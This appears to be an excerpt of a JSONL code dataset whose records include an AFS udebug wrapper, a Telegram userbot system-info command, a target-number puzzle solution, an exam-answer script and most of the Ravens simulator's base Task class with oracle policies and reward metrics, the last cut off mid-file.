getShortInfo(self,name_or_ip,port,_cfg=None) :\n        \"\"\"\n        return dict containing all info from a simple udebug\n        \"\"\" \n        # no \"-long\" flag here; as in getLongInfo, execution is handled by the @execwrapper decorator\n        CmdList=[_cfg.binaries[\"udebug\"],\"-server\", \"%s\" % name_or_ip, \"-port\", \"%s\" % port]\n        return CmdList,PM.parse_getShortInfo\n\n","sub_path":"afs/dao/UbikPeerDAO.py","file_name":"UbikPeerDAO.py","file_ext":"py","file_size_in_byte":1013,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"84334641","text":"from asyncio.subprocess import create_subprocess_shell as asyncrunapp, PIPE as asyncPIPE\n\nfrom ..help import add_help_item\nfrom userbot.events import register\n\n\n@register(outgoing=True, pattern=r\"^\\.sysd$\")\nasync def sysdetails(sysd):\n    \"\"\" For .sysd command, get system info using neofetch. 
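# Editor's sketch of the same pattern outside the bot framework: run a shell
# command with asyncio and capture both output streams (Python 3.7+):
import asyncio

async def run_shell(cmd):
    proc = await asyncio.create_subprocess_shell(
        cmd,
        stdout=asyncio.subprocess.PIPE,
        stderr=asyncio.subprocess.PIPE,
    )
    stdout, stderr = await proc.communicate()
    return stdout.decode().strip() + stderr.decode().strip()

# usage: print(asyncio.run(run_shell('neofetch --stdout')))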
\"\"\"\n if not sysd.text[0].isalpha() and sysd.text[0] not in (\"/\", \"#\", \"@\", \"!\"):\n try:\n neo = \"neofetch --stdout\"\n fetch = await asyncrunapp(\n neo,\n stdout=asyncPIPE,\n stderr=asyncPIPE,\n )\n\n stdout, stderr = await fetch.communicate()\n result = str(stdout.decode().strip()) \\\n + str(stderr.decode().strip())\n\n await sysd.edit(\"`\" + result + \"`\")\n except FileNotFoundError:\n await sysd.edit(\"Please install neofetch before using this\", delete_in=3)\n\nadd_help_item(\n \".sysd\",\n \"Misc\",\n \"Gets system information using neofetch.\",\n \"`.sysd`\"\n)\n","sub_path":"userbot/modules/misc/sysd.py","file_name":"sysd.py","file_ext":"py","file_size_in_byte":1004,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"66856598","text":"'''\n풀이 1 - 이진 탐색 트리는 아니지만 계산 결과를 층으로 나누어 누적합 계산하기\n- 질문 게시판 참고했습니다;\n- 현재 레이어(배열)에 존재하는 값에 다음에 오는 숫자를 더하고 빼서 추가\n- 예 : numbers = [1, 2, 3] \n 1\n 1+2 1-2 \n 1+2+3 1+2-3 1-2+3 1-2-3\n- 다음 레이어에 있는 원소 개수는 이전 레이어의 원소 개수보다 2배씩 증가함\n- 최종 레이어에 존재하는 값에서 원하는 target이 있는지 여부를 카운트하기\n\n'''\n\ndef solution(numbers, target):\n\n answer = 0\n curr_layer = []\n\n for idx in range(len(numbers)):\n \n next_layer = []\n next_num = numbers[idx]\n if idx == 0:\n curr_layer.append(numbers[idx])\n curr_layer.append(-numbers[idx])\n else:\n for curr_num in curr_layer:\n next_layer.append(curr_num + next_num)\n next_layer.append(curr_num - next_num)\n\n curr_layer = next_layer\n \n answer = curr_layer.count(target)\n\n return answer\n\n'''\n풀이 2 - 이진트리 생성 후 dfs 수행(실패)\n...결과를 보니 뭔가 이상함\n'''\n\n'''\nclass Node:\n def __init__(self, data):\n self.data = data\n self.left = None\n self.right = None\n\nclass BinaryTree():\n def __init__(self, root):\n self.root = root\n \n def insert(self, val):\n self.root = self._insert_val(self.root, val)\n return self.root is not None\n\n def _insert_val(self, node, data):\n if node is None:\n node = Node(data)\n else:\n node.left = self._insert_val(node.left, data)\n node.right = self._insert_val(node.right, (-1)*data)\n \n return node\n\n \n global nums\n nums = []\n \n def preorder(self, n):\n if n != None: \n nums.append(n.data)\n if n.left:\n self.preorder(n.left)\n if n.right:\n self.preorder(n.right)\n\n\n\n\ndef solution(numbers, target):\n \n tree=BinaryTree(Node(0))\n\n for num in numbers:\n tree.insert(num)\n \n tree.preorder(tree.root)\n\n len_n = len(numbers)\n answer = 0\n\n for i in range(1, len(nums) - len_n, len_n):\n print(nums[i:i+len_n])\n if sum(nums[i:i+len_n]) == target:\n answer += 1\n \n print(len(nums))\n return answer\n\n'''\n","sub_path":"JYP/Programmers_test_kit/target_number.py","file_name":"target_number.py","file_ext":"py","file_size_in_byte":2450,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"478866687","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Nov 28 09:42:16 2019\n\n@author: student\n\"\"\"\n\nfrom example.gisa import gisa_test\nfile = open('./data/Abc1115.txt')\nlines = file.readlines()\nfile.close()\n#print(lines[0:5])\ntest = gisa_test.GisaTest(lines)\n\nr1 = test.solve_1()\nprint(r1)\nr2 = test.solve_2()\nprint(r2) \nr3 = test.solve_3()\nprint(r3)\nr4 = test.solve_4()\nprint(r4)\n\noutput = open('./data/answers.txt','w')\noutput.write(\"{}\\n\".format(r1))\noutput.write(\"{}\\n\".format(r2))\noutput.write(\"{}\\n\".format(r3))\noutput.write(\"{}\\n\".format(r4))\noutput.close()\n\n\n'''\nsample = test.students[0:10]\nfor s in sample:\n #print(s)\n pass\n\ncount = 
0\ntot = 0\nfor stu in test.students:\n if stu.data3 > 0:\n count += 1\n tot += stu.data3\n print(stu)\n pass\n pass\n\nprint(count,tot)\n'''","sub_path":"김정호강사님_spyder/my_project/gisa.py","file_name":"gisa.py","file_ext":"py","file_size_in_byte":803,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"12176857","text":"# coding=utf-8\n# Copyright 2020 The Google Research Authors.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\n\"\"\"Base Task class.\"\"\"\n\nimport collections\nimport os\nimport random\nimport string\n\nimport cv2\nimport numpy as np\nimport pybullet as p\n\nfrom ravens import cameras\nfrom ravens import tasks\nfrom ravens import utils\n\nimport scipy\nfrom scipy.spatial import ConvexHull\n\n# A pose + threshold to gracefully handle failure cases in bag tasks.\nIDENTITY = {\n 'pose0': ((0.3, 0, 0.3), (0, 0, 0, 1)),\n 'pose1': ((0.3, 0, 0.3), (0, 0, 0, 1))\n}\nBEAD_THRESH = 0.33\n\n\nclass Task():\n \"\"\"Base Task class.\"\"\"\n\n def __init__(self):\n self.mode = 'train'\n\n # Evaluation epsilons (for pose evaluation metric).\n self.position_eps = 0.01\n self.rotation_eps = np.deg2rad(15)\n\n # Workspace bounds.\n self.pixel_size = 0.003125\n self.camera_config = cameras.RealSenseD415.CONFIG\n self.bounds = np.array([[0.25, 0.75], [-0.5, 0.5], [0, 0.28]])\n\n # Only True for goal-based tasks, IF testing (affects ground-truth labels).\n self.goal_cond_testing = False\n\n # (For bag tasks) If taken identiy action, exit gracefully.\n self.exit_gracefully = False\n\n #-------------------------------------------------------------------------\n # Oracle Implementation\n #-------------------------------------------------------------------------\n\n def oracle(self, env):\n \"\"\"Oracle Implementation.\"\"\"\n OracleAgent = collections.namedtuple('OracleAgent', ['act'])\n\n def act(obs, info):\n \"\"\"Calculate action.\"\"\"\n del info\n\n act = {'camera_config': self.camera_config, 'primitive': None}\n if not obs or self.done():\n return act\n\n # Oracle uses ground truth object segmentation masks.\n colormap, heightmap, object_mask = self.get_object_masks(env)\n\n # First, for any custom envs w/pick-place, handle those first.\n if (isinstance(self, tasks.names['cable-ring']) or\n isinstance(self, tasks.names['cable-ring-notarget'])):\n # ------------------------------------------------------------ #\n # Instead of assigning fixed target zones, pick the closest\n # circle to target mapping, then correct for the largest\n # discrepancy. Upon inspection, I think we could fine-tune this\n # a bit more by avoiding any pull that makes the bead cross\n # over itself. 
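# Editor's sketch (standalone, mirroring the assignment search that follows):
# try every cyclic shift of the bead ordering, in both directions, and keep
# the mapping with the smallest mean bead-to-target distance.
import numpy as np

def best_ring_assignment(verts, targets):
    """verts, targets: (N, 3) arrays; returns (best mean distance, mapping)."""
    n = len(verts)
    best_dist, best_map = np.inf, None
    for a in range(n):
        base = list(range(a, n)) + list(range(a))
        for mapping in (base, base[::-1]):  # reversed order handles a flipped ring
            dists = np.linalg.norm(targets - verts[mapping], axis=1)
            if dists.mean() < best_dist:
                best_dist, best_map = dists.mean(), mapping
    return best_dist, best_map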
Not sure how to precisely do that.\n # ------------------------------------------------------------ #\n vert_pos_l = []\n for bead_id in self.cable_bead_ids:\n bead_position = p.getBasePositionAndOrientation(bead_id)[0]\n vert_pos_l.append(bead_position)\n vertpos_xyz_np = np.array(vert_pos_l)\n\n targets_l = []\n for bead_id in self.goal['places']:\n target_position, _ = self.goal['places'][bead_id]\n targets_l.append(target_position)\n targets_xyz_np = np.array(targets_l)\n\n assert vertpos_xyz_np.shape == targets_xyz_np.shape\n nb_maps = len(self.cable_bead_ids)\n min_dist = np.float('inf')\n vertex_pos, target_pos = None, None\n\n # Different (but 'rotationally consistent') ordering of beads.\n for a in range(nb_maps * 2):\n if a < nb_maps:\n # mapping = [a, a+1, ..., nb_maps-1, 0, 1, ..., a-1]\n mapping = list(range(a, nb_maps)) + list(range(0, a))\n else:\n # Same as above but reverse it (to handle flipped ring).\n a -= nb_maps\n mapping = list(range(a, nb_maps)) + list(range(0, a))\n mapping = mapping[::-1]\n differences = targets_xyz_np - vertpos_xyz_np[mapping]\n distances = np.linalg.norm(differences, axis=1)\n average_distance = np.mean(distances)\n\n if average_distance < min_dist:\n # Index of the largest distance among vertex + target.\n max_idx = np.argmax(distances)\n vertex_pos = vertpos_xyz_np[mapping][max_idx]\n target_pos = targets_xyz_np[max_idx]\n min_dist = average_distance\n\n overshoot = 0.0\n act['params'] = self.params_no_rots(vertex_pos, target_pos, overshoot)\n\n elif (isinstance(self, tasks.names['cloth-flat']) or\n isinstance(self, tasks.names['cloth-flat-notarget'])):\n # ------------------------------------------------------------ #\n # The cloth is always in the same side up, so we assume a\n # clockwise ordering of cloth corners to zone corners. 
The\n # first action should grip the cloth corner closest to the zone\n # and pull it to the furthest zone corner.\n # ------------------------------------------------------------ #\n mappings = [\n [0, 1, 2, 3],\n [3, 0, 1, 2],\n [2, 3, 0, 1],\n [1, 2, 3, 0],\n ]\n\n # Get cloth mesh data and info about cloth/zone corners.\n _, vert_pos_l = p.getMeshData(bodyUniqueId=self.cloth_id)\n corner_idx_np = np.array(self.corner_indices)\n targets_xy_np = self.corner_targets_xy\n vertpos_xy_np = np.array(vert_pos_l)[:, :2]\n min_dist = np.float('inf')\n min_std = np.float('inf')\n vertex_pos = None\n target_pos = None\n\n # Iterate through corner assignments.\n for mapping in mappings:\n corners = corner_idx_np[mapping]\n differences = targets_xy_np - vertpos_xy_np[corners]\n distances = np.linalg.norm(differences, axis=1)\n avg_dist = np.min(distances)\n avg_std = np.std(distances)\n\n if (self.t == 0) and (avg_std <= min_std):\n # Pick cloth corner closest to _zone_ center.\n min_std = avg_std\n zone_xy = np.array(self.zone_pose[0][:2]).reshape(1, 2)\n differences = zone_xy - vertpos_xy_np[corners]\n distances = np.linalg.norm(differences, axis=1)\n idx = np.argmin(distances)\n vertex_pos = vertpos_xy_np[corners][idx]\n target_pos = targets_xy_np[idx]\n elif (self.t != 0) and (avg_dist <= min_dist):\n # Otherwise, consider largest discrepancy in match.\n min_dist = avg_dist\n idx = np.argmax(distances)\n vertex_pos = vertpos_xy_np[corners][idx]\n target_pos = targets_xy_np[idx]\n else:\n # If the above don't apply, DON'T update positions.\n pass\n self.t += 1\n\n # Currently overshooting slightly due to cloth physics.\n overshoot = 0.03\n act['params'] = self.params_no_rots(vertex_pos, target_pos, overshoot)\n\n elif isinstance(self, tasks.names['cloth-cover']):\n # ------------------------------------------------------------ #\n # Put item on the center of the cloth, then pick and pull cloth\n # so it covers it against a triangular folds. Asusmes one cube\n # to be inserted onto cloth (and that action always succeeds).\n # ------------------------------------------------------------ #\n assert len(self.block_ids) == 1 # For now\n\n # Get cloth mesh data and info about cloth/zone corners.\n _, vert_pos_l = p.getMeshData(bodyUniqueId=self.cloth_id)\n corner_idx_np = np.array(self.corner_indices)\n vertpos_xy_np = np.array(vert_pos_l)[:, :2]\n cloth_center_xy = np.mean(vertpos_xy_np[corner_idx_np], axis=0)\n\n # Compute task stage. TODO this is a really bad hack.\n if self.t > 0:\n self.task_stage = 2\n self.t += 1\n\n if self.task_stage == 1:\n # Put a cube on the center of the cloth.\n block_id = self.block_ids[0]\n vertex_pos = p.getBasePositionAndOrientation(block_id)[0]\n target_pos = cloth_center_xy\n overshoot = 0.0\n\n elif self.task_stage == 2:\n # Fold the cloth. 
Must pick one of the four directions.\n                direction = np.random.randint(4)\n                if direction == 0:\n                    source = corner_idx_np[0]\n                    target = corner_idx_np[2]\n                elif direction == 1:\n                    source = corner_idx_np[1]\n                    target = corner_idx_np[3]\n                elif direction == 2:\n                    source = corner_idx_np[2]\n                    target = corner_idx_np[0]\n                elif direction == 3:\n                    source = corner_idx_np[3]\n                    target = corner_idx_np[1]\n                vertex_pos = vertpos_xy_np[source]\n                target_pos = vertpos_xy_np[target]\n                overshoot = 0.03\n\n            # We adjusted overshooting earlier based on the task stage.\n            act['params'] = self.params_no_rots(vertex_pos, target_pos, overshoot)\n\n        elif isinstance(self, tasks.names['bag-alone-open']):\n            # ------------------------------------------------------------ #\n            # Have a circular ring of targets on the 2D plane, and want to\n            # maximize bag opening area. Due to rotations, we consider 32\n            # different bead to target 'assignments'. Pick the one that is\n            # closest w.r.t. the xy plane. THEN find the single bag top\n            # ring vertex and corner target that's furthest. Unlike\n            # cable-ring, this does NOT consider 'flipped beads' in the\n            # rotation, due to the way the bag is sampled.\n            # ------------------------------------------------------------ #\n            visible_beads = []\n            for bead in self.cable_bead_ids:\n                if bead in object_mask:\n                    visible_beads.append(bead)\n            frac_visible = len(visible_beads) / len(self.cable_bead_ids)\n\n            # If only a few beads are visible, exit early.\n            if frac_visible <= BEAD_THRESH:\n                self.exit_gracefully = True\n                print(f'WARNING: fraction of visible beads: {frac_visible}')\n                act['params'] = IDENTITY\n                act['primitive'] = self.primitive\n                return act\n\n            # Get vertex information of beads, then targets for those.\n            vert_pos_l = []\n            for bead_id in self.cable_bead_ids:\n                bead_position = p.getBasePositionAndOrientation(bead_id)[0]\n                vert_pos_l.append(bead_position)\n            vertpos_xyz_np = np.array(vert_pos_l)\n            targets_l = self.circle_target_positions\n            targets_xyz_np = np.array([[p[0], p[1], p[2]] for p in targets_l])\n\n            assert vertpos_xyz_np.shape == targets_xyz_np.shape\n            assert len(self.top_ring_idxs) == len(self.cable_bead_ids)\n            nb_maps = len(self.top_ring_idxs)\n            min_dist = float('inf')\n            vertex_pos, target_pos = None, None\n\n            for a in range(nb_maps):\n                # mapping = [a, a+1, ..., nb_maps-1, 0, 1, ..., a-1]\n                mapping = list(range(a, nb_maps)) + list(range(0, a))\n                differences = targets_xyz_np - vertpos_xyz_np[mapping]\n                distances = np.linalg.norm(differences, axis=1)\n                average_distance = np.mean(distances)\n\n                if average_distance < min_dist:\n                    # Index of the largest distance among vertex + target.\n                    max_idx = np.argmax(distances)\n                    vertex_pos = vertpos_xyz_np[mapping][max_idx]\n                    target_pos = targets_xyz_np[max_idx]\n                    min_dist = average_distance\n\n            # Make the robot 'overshoot' slightly towards the target position.\n            overshoot = 0.02\n            act['params'] = self.params_no_rots(vertex_pos, target_pos, overshoot)\n\n        elif (isinstance(self, tasks.names['bag-items-easy']) or\n                isinstance(self, tasks.names['bag-items-hard'])):\n            # ------------------------------------------------------------ #\n            # Hard-coding the task stage selection in the subclasses, so\n            # that the oracle and learned policies can use the code.\n            # ------------------------------------------------------------ #\n            # (1) Same as bag-alone-open to open up the bag.\n            # (2) Insert items into the bag. Refer to `self.item_ids` for\n            # items to insert. 
Use the segmentation mask for placing.\n            # (3) Move the bag with the item(s).\n            # ------------------------------------------------------------ #\n            visible_beads = []\n            for bead in self.cable_bead_ids:\n                if bead in object_mask:\n                    visible_beads.append(bead)\n\n            # Allocate the stage selection to the task-specific method.\n            success, place_pixels_eroded = self.determine_task_stage(\n                colormap=colormap,\n                heightmap=heightmap,\n                object_mask=object_mask,\n                visible_beads=visible_beads)\n\n            # Exit gracefully.\n            if not success:\n                self.exit_gracefully = True\n                act['params'] = IDENTITY\n                act['primitive'] = self.primitive\n                return act\n\n            if self.task_stage == 1:\n                # Copy bag-alone-open.\n                vert_pos_l = []\n                for bead_id in self.cable_bead_ids:\n                    bead_position = p.getBasePositionAndOrientation(bead_id)[0]\n                    vert_pos_l.append(bead_position)\n                vertpos_xyz_np = np.array(vert_pos_l)\n\n                targets_l = self.circle_target_positions\n                targets_xyz_np = np.array([[p[0], p[1], p[2]] for p in targets_l])\n\n                assert vertpos_xyz_np.shape == targets_xyz_np.shape\n                assert len(self.top_ring_idxs) == len(self.cable_bead_ids)\n                nb_maps = len(self.top_ring_idxs)\n                min_dist = float('inf')\n                vertex_pos, target_pos = None, None\n\n                for a in range(nb_maps):\n                    # mapping = [a, a+1, ..., nb_maps-1, 0, 1, ..., a-1]\n                    mapping = list(range(a, nb_maps)) + list(range(0, a))\n                    differences = targets_xyz_np - vertpos_xyz_np[mapping]\n                    distances = np.linalg.norm(differences, axis=1)\n                    average_distance = np.mean(distances)\n\n                    if average_distance < min_dist:\n                        # Index of the largest distance among vertex + target.\n                        max_idx = np.argmax(distances)\n                        vertex_pos = vertpos_xyz_np[mapping][max_idx]\n                        target_pos = targets_xyz_np[max_idx]\n                        min_dist = average_distance\n\n                # Make the robot 'overshoot' slightly towards the target position.\n                overshoot = 0.02\n                act['params'] = self.params_no_rots(vertex_pos, target_pos, overshoot)\n\n            elif self.task_stage == 2:\n                # Identify an item that is not within the bag.\n                item = None\n                for id_ in self.item_ids:\n                    if id_ not in self.items_in_bag_ids:\n                        item = id_\n                        pick_mask = np.uint8(object_mask == item)\n                        pick_mask = cv2.erode(pick_mask, np.ones((3, 3), np.uint8))\n                        assert np.sum(pick_mask) > 0\n                        break\n                assert item is not None\n\n                # Key assumption: we assume the placing will be successful.\n                self.items_in_bag_ids.append(item)\n\n                # Compute picking point. Sample anywhere on item's eroded area.\n                pick_prob = np.float32(pick_mask)\n                pick_pixel = utils.sample_distribution(pick_prob)\n                pick_position = utils.pixel_to_position(pick_pixel, heightmap,\n                    self.bounds, self.pixel_size)\n                p0 = pick_position\n\n                # Placing position. Sample anywhere on the open eroded area.\n                place_prob = np.float32(place_pixels_eroded)\n                place_pixel = utils.sample_distribution(place_prob)\n                place_position = utils.pixel_to_position(place_pixel, heightmap,\n                    self.bounds, self.pixel_size)\n                p1 = place_position\n\n                # Get the usual action parameter, without overshooting.\n                act['params'] = self.params_no_rots(p0, p1, overshoot=0.0)\n\n                if isinstance(self, tasks.names['bag-items-hard']):\n                    new_pose1 = act['params']['pose1']\n\n                    # But now sample the rotation, assuming we use 24 (TODO: make more\n                    # robust?).\n                    num_rots = 24\n                    rots = [i * 2 * np.pi / num_rots for i in range(num_rots)]\n                    rot = np.random.choice(rots)\n                    # rot_deg = rot * 180 / np.pi\n\n                    # Assign placing pose. 
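(Aside, a worked check of the grid sampled above: with num_rots = 24\n                    # the candidate yaw values are i * 2*pi/24 radians, i.e.\n                    # 0, 15, 30, ..., 345 degrees; the sampled rot is applied\n                    # below to the placing pose only.)\n                    # 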
Picking still uses identity rotation.\n new_rot1 = p.getQuaternionFromEuler((0, 0, rot))\n new_pose1 = (new_pose1[0], new_rot1)\n act['params']['pose1'] = new_pose1\n\n elif self.task_stage == 3:\n # Bag gripping + depositing. Currently considering any VISIBLE bead as\n # pick points at random. If we filter data, hopefully a pattern\n # appears.\n p0 = None\n p1 = self.zone_pose[0]\n\n if not visible_beads:\n print('WARNING: no visible beads in task stage 3??')\n visible_beads.append(self.cable_bead_ids[0])\n\n bead_id = np.random.choice(visible_beads)\n p0 = p.getBasePositionAndOrientation(bead_id)[0]\n act['params'] = self.params_no_rots(p0, p1, overshoot=0.0)\n\n elif (self.primitive == 'pick_place' or\n self.primitive == 'pick_place_6dof'):\n\n # Trigger reset if no ground truth steps are available.\n if not self.goal['steps']:\n self.goal['steps'] = [] # trigger done then reset\n return act\n\n # Get possible picking locations (prioritize furthest).\n next_step = self.goal['steps'][0]\n possible_objects = np.int32(list(next_step.keys())).copy()\n distances = []\n for object_id in possible_objects:\n position = p.getBasePositionAndOrientation(object_id)[0]\n targets = next_step[object_id][1]\n targets = [t for t in targets if t in self.goal['places']]\n places = [self.goal['places'][t][0] for t in targets]\n d = np.float32(places) - np.float32(position).reshape(1, 3)\n distances.append(np.min(np.linalg.norm(d, axis=1)))\n distances_sort = np.argsort(distances)[::-1]\n possible_objects = possible_objects[distances_sort]\n for object_id in possible_objects:\n pick_mask = np.uint8(object_mask == object_id)\n pick_mask = cv2.erode(pick_mask, np.ones((3, 3), np.uint8))\n if np.sum(pick_mask) > 0:\n break\n\n # Trigger task reset if no object is visible.\n if np.sum(pick_mask) == 0:\n self.goal['steps'] = [] # trigger done then reset\n return act\n\n # Compute picking pose.\n pick_prob = np.float32(pick_mask)\n pick_pixel = utils.sample_distribution(pick_prob)\n # For \"deterministic\" demonstrations on insertion-easy, use this:\n # pick_pixel = (160,80)\n pick_position = utils.pixel_to_position(pick_pixel, heightmap,\n self.bounds, self.pixel_size)\n pick_rotation = utils.get_pybullet_quaternion_from_rot((0, 0, 0))\n pick_pose = (pick_position, pick_rotation)\n\n # Get candidate target placing poses.\n targets = next_step[object_id][1]\n targets = [pi for pi in targets if pi in self.goal['places']]\n i = np.random.randint(0, len(targets))\n true_pose = self.goal['places'][targets[i]]\n\n # Compute placing pose.\n object_pose = p.getBasePositionAndOrientation(object_id)\n world_to_pick = utils.invert(pick_pose)\n object_to_pick = utils.multiply(world_to_pick, object_pose)\n pick_to_object = utils.invert(object_to_pick)\n place_pose = utils.multiply(true_pose, pick_to_object)\n\n # For various cable-envs, we don't want to apply rotations.\n if (isinstance(self, tasks.names['cable']) or\n isinstance(self, tasks.names['cable-shape']) or\n isinstance(self, tasks.names['cable-shape-notarget']) or\n isinstance(self, tasks.names['cable-line-notarget'])):\n place_pose = (place_pose[0], (0, 0, 0, 1))\n\n params = {'pose0': pick_pose, 'pose1': place_pose}\n act['params'] = params\n\n elif isinstance(self, tasks.names['sweeping']):\n p0 = None\n p1 = self.zone_pose[0]\n\n # Set farthest object position as start position.\n for object_id in self.object_points:\n object_pose = p.getBasePositionAndOrientation(object_id)\n position = self.object_points[object_id].squeeze()\n position = 
utils.apply(object_pose, position)\n            d = np.linalg.norm(np.float32(position) - np.float32(p1))\n            if (p0 is None) or (d > threshold):\n                p0 = position\n                threshold = d\n\n        # Adjust start and end positions.\n        p0 = (p0[0], p0[1], 0.001)\n        p1 = (p1[0], p1[1], 0.001)\n        rotation = utils.get_pybullet_quaternion_from_rot((0, 0, 0))\n        direction = np.float32(p0) - np.float32(p1)\n        length = np.linalg.norm(direction)\n        direction = direction / length\n        new_p0 = np.float32(p1) + direction * (length + 0.02)\n        new_p1 = np.float32(p0) - direction * (length - 0.05)\n        p0, p1 = tuple(new_p0), tuple(new_p1)\n\n        params = {'pose0': (p0, rotation), 'pose1': (p1, rotation)}\n        act['params'] = params\n\n    elif isinstance(self, tasks.names['pushing']):\n\n        # Get start position.\n        p0 = np.float32(p.getLinkState(env.ur5, env.ee_tip_link)[0])\n        rotation = utils.get_pybullet_quaternion_from_rot((0, 0, 0))\n\n        # Compute end position.\n        goal_position = np.array([0.5, -0.5, 0])\n        object_id = env.objects[0]\n        object_pose = p.getBasePositionAndOrientation(object_id)\n        world_to_object = utils.invert(object_pose)\n        goal_position = utils.apply(world_to_object, goal_position)\n        p1_object = np.float32(goal_position)\n        p1_object[0] = -p1_object[0] * 2\n        p1 = utils.apply(object_pose, p1_object)\n\n        push_direction = (p1 - p0) / np.linalg.norm((p1 - p0))\n        p1 = p0 + push_direction * 0.01\n\n        params = {'pose0': (p0, rotation), 'pose1': (p1, rotation)}\n        act['params'] = params\n    else:\n        raise ValueError(f'Task {self} is not supported! {tasks.names}')\n\n    act['primitive'] = self.primitive\n    return act\n\n    return OracleAgent(act)\n\n    def params_no_rots(self, vertex_pos, target_pos, overshoot):\n        \"\"\"Helper to handle common pick-place code for the oracle policy.\n\n        We often have this pattern: vertex positions and target positions in\n        2D, and then potentially slightly overshoot the target. For example,\n        with cloth it's helpful to do this since otherwise the physics will\n        favor the cloth 'resetting' to its original state. Compute the\n        direction vector and extend it past the target. Then form tuples\n        for the action params. Assumes no new rotations.\n\n        Args:\n            vertex_pos: 2D tuple or array representing picking position.\n            target_pos: 2D tuple or array representing target position.\n            overshoot: how much to go beyond the target position.\n\n        Returns:\n            Dict for the action with 'pose0' and 'pose1' keys.\n        \"\"\"\n        p0 = (vertex_pos[0], vertex_pos[1], 0.001)\n        p1 = (target_pos[0], target_pos[1], 0.001)\n        direction = np.float32(p0) - np.float32(p1)\n        length = np.linalg.norm(direction)\n        direction = direction / length\n        new_p0 = np.float32(p1) + direction * (length - 0.00)\n        new_p1 = np.float32(p0) - direction * (length + overshoot)\n        p0, p1 = tuple(new_p0), tuple(new_p1)\n        params = {'pose0': (p0, (0, 0, 0, 1)), 'pose1': (p1, (0, 0, 0, 1))}\n        return params\n\n    #-------------------------------------------------------------------------\n    # Reward Function and Task Completion Metrics\n    #-------------------------------------------------------------------------\n\n    def reward(self):\n        \"\"\"Compute the (delta) reward for current timestep.\n\n        Returns:\n            A tuple consisting of the scalar (delta) reward, plus `extras`\n            dict which has extra task-dependent info from the process of\n            computing rewards that gives us finer-grained details. 
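A minimal usage sketch (`task` here stands for any Task instance;\n            the name is illustrative, not one defined in this file):\n\n                reward, extras = task.reward()\n                episode_return += reward  # per-step deltas sum to total_rewards\n\n            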
Use\n `extras` for further data analysis.\n \"\"\"\n reward = 0\n extras = {}\n if self.done():\n return reward, extras\n\n # Pose-based evaluation metric.\n if self.metric == 'pose':\n curr_step = self.goal['steps'][0] # pass-by-reference\n\n for object_id in list(curr_step.keys()):\n curr_pose = p.getBasePositionAndOrientation(object_id)\n\n # Get all possible placement poses.\n places_positions = np.zeros((0, 3))\n places_rotations = np.zeros((0, 3))\n symmetry, places = curr_step[object_id]\n places = [t for t in places if t in self.goal['places']]\n for place in places:\n pose = self.goal['places'][place]\n places_positions = np.vstack((places_positions, pose[0]))\n rotation = utils.get_rot_from_pybullet_quaternion(pose[1])\n places_rotations = np.vstack((places_rotations, rotation))\n\n # Compute translational error.\n curr_position = np.array(curr_pose[0])[:2].reshape(1, 2)\n error_t = places_positions[:, :2] - curr_position\n error_t = np.linalg.norm(error_t, axis=1)\n\n # Compute rotational error.\n error_r = 0\n if symmetry > 0:\n curr_rotation = utils.get_rot_from_pybullet_quaternion(\n curr_pose[1])[2]\n error_r = places_rotations[:, 2] - curr_rotation\n error_r = abs(error_r) % symmetry\n neg_ind = error_r > (symmetry / 2)\n error_r[neg_ind] = symmetry - error_r[neg_ind]\n\n # Compute reward from error.\n success_t = error_t < self.position_eps\n success_r = error_r < self.rotation_eps\n success = success_t & success_r\n if any(success):\n reward += 1. / self.num_steps\n\n # Remove from possible placement poses.\n place = places[np.argwhere(success).squeeze()]\n self.goal['places'].pop(place)\n curr_step.pop(object_id)\n\n # Next step?\n if not curr_step:\n self.goal['steps'].pop(0)\n\n # Zone-based evaluation metric.\n elif self.metric == 'zone':\n total_rewards = 0\n zone_points = []\n for object_id in self.object_points:\n points = self.object_points[object_id]\n object_pose = p.getBasePositionAndOrientation(object_id)\n world_to_zone = utils.invert(self.zone_pose)\n object_to_zone = utils.multiply(world_to_zone, object_pose)\n points = np.float32(utils.apply(object_to_zone, points))\n valid_points = np.logical_and.reduce([\n points[0, :] > -self.zone_size[0] / 2,\n points[0, :] < self.zone_size[0] / 2,\n points[1, :] > -self.zone_size[1] / 2,\n points[1, :] < self.zone_size[1] / 2, points[2, :] > -0.01,\n points[2, :] < self.bounds[2, 1]\n ]).tolist()\n if hasattr(self, 'goal'):\n if not isinstance(self, tasks.names['cable']):\n if len(self.goal['steps']) and any(valid_points):\n if object_id == list(self.goal['steps'][0].keys())[0]:\n self.goal['steps'].pop(0)\n zone_points += valid_points\n total_rewards = np.sum(np.array(zone_points)) / len(zone_points)\n reward = total_rewards - self.total_rewards\n self.total_rewards = total_rewards\n\n # Palletizing: spawn another box in the workspace if it is empty.\n if isinstance(self, tasks.names['palletizing']):\n if self.goal['steps']:\n workspace_empty = True\n for object_id in self.object_points:\n object_pose = p.getBasePositionAndOrientation(object_id)\n workspace_empty = workspace_empty and ((object_pose[0][1] < -0.5) or\n (object_pose[0][1] > 0))\n if workspace_empty:\n object_id = list(self.goal['steps'][0].keys())[0]\n theta = np.random.random() * 2 * np.pi\n rotation = utils.get_pybullet_quaternion_from_rot((0, 0, theta))\n p.resetBasePositionAndOrientation(object_id, [0.5, -0.25, 0.1],\n rotation)\n\n elif self.metric == 'cable-target':\n # ---------------------------------------------------------------- #\n # When a 
